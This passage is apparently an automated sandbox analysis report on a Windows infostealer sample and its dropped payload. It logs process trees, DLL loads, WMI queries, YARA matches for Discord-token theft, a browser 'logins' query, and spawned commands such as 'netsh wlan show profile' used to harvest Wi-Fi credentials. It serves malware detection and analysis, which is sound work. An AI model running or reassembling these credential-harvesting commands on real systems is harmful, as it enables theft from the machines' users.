                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_00423C810_2_00423C81
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_00411E780_2_00411E78
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_00442E0C0_2_00442E0C
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_00420EC00_2_00420EC0
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0044CF170_2_0044CF17
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_00444FD20_2_00444FD2
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeCode function: 1_2_00007FFD9B888C521_2_00007FFD9B888C52
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeCode function: 1_2_00007FFD9B8B68A81_2_00007FFD9B8B68A8
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeCode function: 1_2_00007FFD9B8A78C81_2_00007FFD9B8A78C8
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeCode function: 1_2_00007FFD9B887EA61_2_00007FFD9B887EA6
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeCode function: 1_2_00007FFD9B8B8D501_2_00007FFD9B8B8D50
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeCode function: 1_2_00007FFD9B8A70B01_2_00007FFD9B8A70B0
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeCode function: 1_2_00007FFD9B8C26A01_2_00007FFD9B8C26A0
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeCode function: 1_2_00007FFD9B89A6C11_2_00007FFD9B89A6C1
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeCode function: 1_2_00007FFD9B8A79781_2_00007FFD9B8A7978
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeCode function: 1_2_00007FFD9B8AAFF81_2_00007FFD9B8AAFF8
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeCode function: 1_2_00007FFD9B8ADC611_2_00007FFD9B8ADC61
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeCode function: 1_2_00007FFD9B8A14561_2_00007FFD9B8A1456
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeCode function: 1_2_00007FFD9B8B43A01_2_00007FFD9B8B43A0
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeCode function: 1_2_00007FFD9B8B43D81_2_00007FFD9B8B43D8
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeCode function: 1_2_00007FFD9B8AC0811_2_00007FFD9B8AC081
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeCode function: 1_2_00007FFD9BA959041_2_00007FFD9BA95904
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: String function: 004115D7 appears 36 times
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: String function: 00416C70 appears 39 times
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: String function: 00445AE0 appears 65 times
                          Source: aut66E4.tmp.0.drStatic PE information: No import functions for PE file found
                          Source: JOUNLV.exe.0.drStatic PE information: No import functions for PE file found
                          Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamestub.exe6 vs LKxcbzlwkz.exe
                          Source: LKxcbzlwkz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: 1.0.JOUNLV.exe.1bb35cc0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                          Source: 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                          Source: 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                          Source: 00000001.00000000.1763580624.000001BB35CC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                          Source: Process Memory Space: LKxcbzlwkz.exe PID: 4924, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                          Source: Process Memory Space: JOUNLV.exe PID: 4828, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                          Source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                          Source: JOUNLV.exe.0.dr, StringsCrypt.csCryptographic APIs: 'CreateDecryptor'
                          Source: aut66E4.tmp.0.dr, StringsCrypt.csCryptographic APIs: 'CreateDecryptor'
                          Source: JOUNLV.exe.0.dr, Report.csTask registration methods: 'CreateTask'
                          Source: aut66E4.tmp.0.dr, Report.csTask registration methods: 'CreateTask'
                          Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@35/91@10/8
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\checkip[1].htmJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6704:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeMutant created: \Sessions\1\BaseNamedObjects\ACR7Q5SJGKRPBM6NVQPJ
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeFile created: C:\Users\user\AppData\Local\Temp\aut66E4.tmpJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\AEAWHK.bat" "
                          Source: LKxcbzlwkz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 4828)
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3001298517.0000000003D3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT * FROM logins;
                          Source: tmpF000.tmp.dat.1.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: LKxcbzlwkz.exeReversingLabs: Detection: 78%
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeFile read: C:\Users\user\Desktop\LKxcbzlwkz.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\LKxcbzlwkz.exe "C:\Users\user\Desktop\LKxcbzlwkz.exe"
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeProcess created: C:\Users\user\AppData\Local\Temp\JOUNLV.exe "C:\Users\user\AppData\Local\Temp\JOUNLV.exe"
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\AEAWHK.bat" "
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\openfiles.exe OPENFILES
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr All
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\deec1b5f-97cf-494d-80f2-5e4fb7cf93cd.bat"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /PID 4828
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /T 2 /NOBREAK
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeProcess created: C:\Users\user\AppData\Local\Temp\JOUNLV.exe "C:\Users\user\AppData\Local\Temp\JOUNLV.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\AEAWHK.bat" "Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssidJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\deec1b5f-97cf-494d-80f2-5e4fb7cf93cd.bat"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\openfiles.exe OPENFILESJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profileJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr AllJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssidJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /PID 4828
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /T 2 /NOBREAK
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: avicap32.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: msvfw32.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: pnrpnsp.dllJump to behavior
